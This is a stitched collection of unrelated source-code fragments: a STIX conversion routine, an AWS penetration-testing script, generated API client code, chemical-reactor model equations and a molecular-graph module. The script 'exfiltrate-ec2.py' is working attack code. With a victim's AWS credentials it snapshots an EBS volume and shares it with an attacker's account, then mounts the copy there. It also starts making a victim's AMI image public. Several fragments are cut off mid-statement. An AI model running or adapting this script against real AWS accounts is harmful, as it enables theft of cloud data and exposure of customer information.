create_relationship(m_id, ref["target_ref"], env, ref["verb"], marking_refs=ref.get("object_marking_refs", []))
)
if is_stix1x_id(ref["target_ref"]):
if not exists_id_key(ref["target_ref"]):
# create one, and add it
new_id = generate_stix2x_id(None, ref["target_ref"].lower())
if new_id is None:
error("Dangling target reference %s in %s", 602, ref["target_ref"], ref["id"])
add_id_value(ref["target_ref"], new_id)
mapped_ids = get_id_value(ref["target_ref"])
if mapped_ids[0] is None:
error("Dangling target reference %s in %s", 602, ref["target_ref"], ref["id"])
first_one = True
for m_id in mapped_ids:
verb = determine_appropriate_verb(ref["relationship_type"], m_id)
if first_one:
ref["target_ref"] = m_id
ref["relationship_type"] = verb
first_one = False
else:
extra_relationships.append(
create_relationship(ref["source_ref"], m_id, env, verb, marking_refs=ref.get("object_marking_refs", []))
)
bundle_instance["relationships"].extend(extra_relationships)
def fix_markings():
for stix2_instance in get_unfinished_marked_objects():
object_marking_refs = []
for marking_ref in stix2_instance.get("object_marking_refs", []):
if isinstance(marking_ref, MarkingStructure):
stix2x_marking = map_1x_markings_to_2x(marking_ref)
if marking_ref != stix2x_marking:
if "definition_type" in stix2x_marking and stix2x_marking["definition_type"] == "ais":
apply_ais_markings(stix2_instance, stix2x_marking)
object_marking_refs.append(stix2x_marking["marking_ref"])
else:
object_marking_refs.append(stix2x_marking["id"])
else:
object_marking_refs.append(marking_ref)
stix2_instance["object_marking_refs"] = object_marking_refs
# Relationships are not in 1.x, so they must be added explicitly to reports.
# This is done after the package has been processed, and the relationships are "fixed", so all relationships are known
#
# For each report:
# For each relationship
# if the source and target are part of the report, add the relationship
# if the source is part of the report, add the relationship AND then the target,
# UNLESS the target ref is "dangling"
# if the target is part of the report, add the relationship AND then the source,
# UNLESS the source ref is "dangling"
def add_relationships_to_reports(bundle_instance):
rels_to_include = []
new_ids = get_id_values()
for rep in bundle_instance["reports"]:
refs_in_this_report = rep["object_refs"]
for rel in bundle_instance["relationships"]:
if (("source_ref" in rel and rel["source_ref"] in refs_in_this_report) and
("target_ref" in rel and rel["target_ref"] in refs_in_this_report)):
| |
<reponame>mgeeky/Penetration-Testing-Tools<filename>clouds/aws/exfiltrate-ec2.py
#!/usr/bin/python3
#
# This script abuses insecure permissions given to the EC2 IAM Role to exfiltrate target EC2's
# filesystem data in a form of it's shared EBS snapshot or publicly exposed AMI image.
#
# CreateSnapshot:
# Abuses:
# ec2:CreateSnapshot
# ec2:ModifySnapshotAttribute
#
# The script will firstly create an EBS volume snapshot of the provided volume id. Then it will
# modify that snapshot's attributes to make it available for the foreign AWS Account that's going to
# be the Attacker's account. Then, the attacker will be able to create an EBS volume out of that snapshot.
# After doing so, the script will stop specified by the Attacker EC2 instance in order to later on attach it
# with a previously created volume. Afterwards, the instance will be restarted and the attacker will be able
# to mount freshly attached volume in the operating system to further examine its contents.
#
# This technique is safe to be demonstrated during AWS Penetration tests.
#
#
# CreateImage:
# Abuses:
# ec2:CreateImage
# ec2:ModifyImageAttribute
#
# NOT FULLY IMPLEMENTED YET.
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
# instance. This image will become publicly available (caution with client sensitive data!). After that, the script
# will attempt to create/import public SSH RSA keys to the attacker's account and then create an EC2 instance using that
# publicly available just created AMI image. Ultimately, the attacker will be able to SSH into newly created box to
# further examine it's filesystem contents.
#
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: <NAME>. / mgeeky, '19, <<EMAIL>>
#
import sys
import pyjq
import json
import time
import boto3
import argparse
from botocore.exceptions import ClientError
config = {
'verbose' : False,
'region' : '',
'victim' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'attacker' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'method' : '',
'volume-id': '',
'instance-id': '',
'attach-instance-id': '',
}
class Logger:
@staticmethod
def _out(x):
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[>] ' + x)
@staticmethod
def info(x):
if config['verbose']:
Logger._out('[.] ' + x)
@staticmethod
def fatal(x):
sys.stdout.write('[!] ' + x + '\n')
sys.exit(1)
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
class ExfiltrateEC2:
session = None
def __init__(self, region, attacker_keys, victim_keys):
self.region = region
self.keys = {
'attacker' : {},
'victim' : {},
}
self.keys['attacker'] = attacker_keys
self.keys['victim'] = victim_keys
self.session = {
'attacker' : None,
'victim' : None,
}
Logger.info(f"Using region: {region}")
Logger.info("Authenticating using Attacker's AWS credentials...")
self.session['attacker'] = self.authenticate(region, attacker_keys)
Logger.info("Authenticating using Victim's AWS credentials...")
self.session['victim'] = self.authenticate(region, victim_keys)
def authenticate(self, region, keys):
session = None
try:
if keys['profile']:
session = boto3.Session(
profile_name = keys['profile'],
region_name = region
)
else:
session = boto3.Session(
aws_access_key_id = keys['access-key'],
aws_secret_access_key = keys['secret-key'],
aws_session_token = keys['token'],
region_name = region
)
except Exception as e:
Logger.fail(f'Could not authenticate to AWS: {e}')
raise e
return session
def get_session(self, whose):
return self.session[whose]
def get_account_id(self, whose):
try:
return self.session[whose].client('sts').get_caller_identity()['Account']
except Exception as e:
Logger.fatal(f'Could not Get Caller\'s identity: {e}')
def create_snapshot(self, attacker_instance_id, volume_id, availability_zone):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
target_user = self.get_account_id('attacker')
snapshot = None
volume_created = None
modify_result = None
Logger.out(f"Step 1: Creating EBS volume snapshot. VolumeId = {volume_id}")
try:
snapshot = victim_client.create_snapshot(
Description = f'Exfiltrated EBS snapshot of volume: {volume_id}',
VolumeId = volume_id
)
Logger.ok(f"Snapshot of volume {volume_id} created: {snapshot['SnapshotId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateSnapshot action on Victim failed. Exception: {e}")
Logger.out(f"Step 2: Modifying snapshot attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_snapshot_attribute(
Attribute = f'createVolumePermission',
OperationType = 'add',
SnapshotId = snapshot['SnapshotId'],
UserIds = [
target_user,
]
)
Logger.ok(f"Snapshot's attributes modified to share it with user {target_user}")
except Exception as e:
Logger.fatal(f"ec2:ModifySnapshotAttribute action on Victim failed. Exception: {e}")
Logger.out(f"Step 3: Waiting for the snapshot to transit into completed state.")
try:
victim_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot['SnapshotId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for snapshot completed state failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 4: Creating EBS volume in Attacker's {target_user} AWS account.")
attacker_instance_data = None
try:
if not availability_zone:
availability_zone = self.region + 'a'
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
availability_zone = inst['Placement']['AvailabilityZone']
attacker_instance_data = inst
Logger.info(f"Obtained Attacker's EC2 instance Availbility Zone automatically: {availability_zone}")
break
except Exception as e:
Logger.fail(f"THIS MAY BE FATAL: Could not enumerate attacker's instance with given InstanceId = {attacker_instance_id}")
Logger.fail(f"Exception: {e}")
raise e
availability_zone = self.region + 'a'
try:
volume_created = attacker_client.create_volume(
AvailabilityZone = availability_zone,
Encrypted = False,
VolumeType = 'gp2',
SnapshotId = snapshot['SnapshotId']
)
Logger.ok(f"Created EBS volume ({volume_created['VolumeId']} at Attacker's side out from exfiltrated snapshot ({snapshot['SnapshotId']})")
except Exception as e:
Logger.fail(f"ec2:CreateVolume action on Attacker failed. Exception: {e}")
Logger.out(f"Step 5: Waiting for the volume to transit into created state.")
try:
attacker_client.get_waiter('volume_available').wait(VolumeIds=[volume_created['VolumeId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for volume available failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 6: Attaching created EBS volume to Attacker's specified EC2 instance")
try:
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
if 'IncorrectInstanceState' in str(e):
Logger.fail("Attacker's machine is in running state, preventing to attach it a volume.")
Logger.info("Trying to stop the EC2 instance, then attach the volume and then restart it.")
try:
attacker_instance = attacker_client.stop_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_stopped').wait(InstanceIds = [attacker_instance_id, ])
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
Logger.fail("Tried to automatically stop attacker's EC2 instance, then attach volume and restart it, but that failed as well.")
Logger.fail(f"Exception: " + str(e))
Logger.info("Restarting it...")
attacker_instance = attacker_client.start_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_running').wait(InstanceIds = [attacker_instance_id, ])
try:
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
attacker_instance_data = inst
break
except: pass
else:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
try:
Logger.out(f"Cleanup. Trying to remove created snapshot ({snapshot['SnapshotId']}) at Victim's estate...")
victim_client.delete_snapshot(SnapshotId = snapshot['SnapshotId'])
Logger.ok(f"Snapshot removed.")
except Exception as e:
Logger.fail(f"(That's ok) ec2:DeleteSnapshot action on Victim failed. Exception: {e}")
ssh_command = 'SSH to the attacker\'s EC2 instance\n'
if attacker_instance_data:
try:
ip = attacker_instance_data['PublicIpAddress']
except:
Logger.fail(f"Could not obtain Attacker's EC2 Public ip address. Available fields:\n {attacker_instance_data}\n")
ip = "ec2-ip-address"
if ip:
ssh_command = f'''SSH to the attacker's EC2 instance
# ssh ec2-user@{ip}
'''
print(f'''
===============================================================
[MODULE FINISHED]
===============================================================
[+] Exfiltrated snapshot of a victim's EBS volume:
VictimVolumeId = {volume_id}
[+] By creating a snapshot of it, shared to the attacker's AWS user ID.
SnapshotId = {snapshot['SnapshotId']}
If everything went fine, Attacker's AWS account {target_user} should have a EBS volume now:
AttackerVolumeId = {volume_created['VolumeId']}
That was attached to the specified attacker's EC2 instance:
AttackerInstanceId = {attacker_instance_id}
AvailibityZone = {availability_zone}
Most likely as a '/dev/xvdf' device.
===============================================================
To examine exfiltrated data:
0) {ssh_command}
1) List block devices mapped:
# lsblk
2) If above listing yielded mapped block device, e.g. xvdf, create a directory for it:
# mkdir /exfiltrated
3) Mount that device's volume:
# mount /dev/xvdf1 /exfiltrated
4) Review it's contents:
# ls -l /exfiltrated
''')
return True
def create_image(self, instance_id, image_name, image_description):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
created_image = None
try:
Logger.out("Step 1: Creating a publicly available AMI image out of specified EC2 instance.")
created_image = victim_client.create_image(
InstanceId = instance_id,
Name = image_name,
Description = image_description
)
Logger.ok(f"AMI Image with name: ({image_name}) created: {created_image['ImageId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
target_user = self.get_account_id('attacker')
Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_image_attribute(
Attribute = 'launchPermission',
ImageId = created_image['ImageId'],
OperationType = 'add',
UserIds = | |
# coding: utf-8
"""
Layered Witness & Control
LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.9.7
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ImageApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_image(self, **kwargs):
"""
Create new image definition
Creates a image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_image_with_http_info(**kwargs)
else:
(data) = self.add_image_with_http_info(**kwargs)
return data
def add_image_with_http_info(self, **kwargs):
"""
Create new image definition
Creates a image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image', 'instrument_image']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'instrument_image' in params:
query_params.append(('InstrumentImage', params['instrument_image']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'image' in params:
body_params = params['image']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_configuration_to_image(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
else:
(data) = self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
return data
def assign_configuration_to_image_with_http_info(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image_with_http_info(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'config_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_configuration_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_configuration_to_image`")
# verify the required parameter 'config_id' is set
if ('config_id' not in params) or (params['config_id'] is None):
raise ValueError("Missing the required parameter `config_id` when calling `assign_configuration_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'config_id' in params:
path_params['configID'] = params['config_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Configs/{configID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_policy_to_image(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
else:
(data) = self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
return data
def assign_policy_to_image_with_http_info(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image_with_http_info(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'policy_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_policy_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_policy_to_image`")
# verify the required parameter 'policy_id' is set
if ('policy_id' not in params) or (params['policy_id'] is None):
raise ValueError("Missing the required parameter `policy_id` when calling `assign_policy_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'policy_id' in params:
path_params['policyID'] = params['policy_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Policies/{policyID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_image(self, image_id, **kwargs):
"""
Delete specified image
Deletes the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to delete (required)
:return: None
If the method is called asynchronously,
returns | |
jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * \
sum(m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k] for k in m.sp) * m.Tgc[it, jt, ix, jx]) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.5 Solid phase adsorbed species balance
# dNse_dt
def de_nsc_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNsc_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(-m.dccwin_dx[it, jt, ix, jx, k] * m.Ax - m.Ksbulk[it, jt, ix, jx, k] - \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) *
m.rsc[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.6 Solid phase energy balance
# dHsc_dt
def de_hsc_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHsc_dt[it, jt, ix, jx] * m.hi_x[ix] \
== (-m.decwin_dx[it, jt, ix, jx] * m.Ax - m.Hsbulk[it, jt, ix, jx] - \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
1 - m.ed[it, jt, ix, jx]) * sum((m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k]) for k in m.sp) * (m.Tgc[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
1 - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tgc[it, jt, ix, jx] - m.Tsc[it, jt, ix, jx])) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.7 Gas phase component balance
# dNge_dt
def de_nge_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNge_dt[it, jt, ix, jx, k] \
== (m.Ax * m.delta[it, jt, ix, jx] * m.Kce[it, jt, ix, jx, k] * (
m.cc[it, jt, ix, jx, k] - m.ce[it, jt, ix, jx, k]) - \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rge[
it, jt, ix, jx, k] - \
m.Kgbulk[it, jt, ix, jx, k] / m.hi_x[ix]) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.8 Gas phase energy balance
# dHge_dt
def de_hge_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHge_dt[it, jt, ix, jx] \
== (m.Ax * m.delta[it, jt, ix, jx] * m.Hce[it, jt, ix, jx] * (
m.Tgc[it, jt, ix, jx] - m.Tge[it, jt, ix, jx]) - \
m.Ax * (1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) - \
m.Hgbulk[it, jt, ix, jx] / m.hi_x[ix] - \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * \
sum(m.rge[it, jt, ix, jx, k] * m.cpgcge[k] for k in m.sp) * m.Tge[it, jt, ix, jx]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.9 Solid phase adsorbed species balance
# dNse_dt
def de_nse_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNse_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(m.dcein_dx[it, jt, ix, jx, k] * m.Ax + m.Ksbulk[it, jt, ix, jx, k] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * m.rse[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.10 Solid phase energy balance
# dHse_dt
def de_hse_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHse_dt[it, jt, ix, jx] * m.hi_x[ix] == \
(m.deein_dx[it, jt, ix, jx] * m.Ax + m.Hsbulk[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * \
sum((m.rge[it, jt, ix, jx, k] * m.cpgcge[k]) for k in m.sp) * m.Tge[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * (
1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.pi * m.dx * m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Nx * m.Cr) * m.hi_t[it]
else:
return Constraint.Skip
# shift the AV?
# dz_dx
def dex_z_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dz_dx[it, jt, ix, jx] == 0
else:
return Constraint.Skip
# Kgbulk
def i1_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Kgbulk[it, jt, ix, jx, k] == m.K_d * (sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) - sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)) * m.yb[it, jt, ix, jx, k]
else:
return Constraint.Skip
# Hgbulk
def i2_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hgbulk[it, jt, ix, jx] == m.K_d * (sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) - sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)) * m.cpg_mol * \
m.Tgb[it, jt, ix, jx]
else:
return Constraint.Skip
# Kgbulk
# oddly derivative looking term here and in the next one
# definetly derivatives e19 and e20 from bfb ss paper
def i3_rule(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.Ksbulk[it, kt, ix, kx, c] == \
-m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.ne[it, kt, ix, kx, c]
else:
return Constraint.Skip
# Hsbulk
# m.Jc[it, jt, ix, jx]-m.Jc[i-1]
def i4_rule(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.Hsbulk[it, kt, ix, kx] == \
-m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.hse[
it, kt, ix, kx]
# elif j == m.ncp_x:
# return m.Hsbulk[it, jt, ix, jx] == -m.Ax * (m.Jc[it, jt, ix, jx] - m.Jc[i, j - 1]) * m.hse[it, jt, ix, jx]
else:
return Constraint.Skip
# db
def i5_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.db[it, jt, ix, jx] == m.dbu[it, jt, ix, jx]
else:
return Constraint.Skip
# vb
def i6_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.vb[it, jt, ix, jx] == \
1.55 * ((m.vg[it, jt, ix, jx] - m.vmf[it, jt]) + 14.1 * (m.db[it, jt, ix, jx] + | |
<reponame>sjklipp/autochem_1219
""" molecular graph
"""
import itertools
import functools
import numpy
import future.moves.itertools as fmit
from qcelemental import periodictable as pt
from automol import dict_
from automol.graph import _networkx
import automol.dict_.multi as mdict
import automol.create.graph as _create
ATM_SYM_POS = 0
ATM_IMP_HYD_VLC_POS = 1
ATM_STE_PAR_POS = 2
BND_ORD_POS = 0
BND_STE_PAR_POS = 1
# getters
def atoms(xgr):
""" atoms, as a dictionary
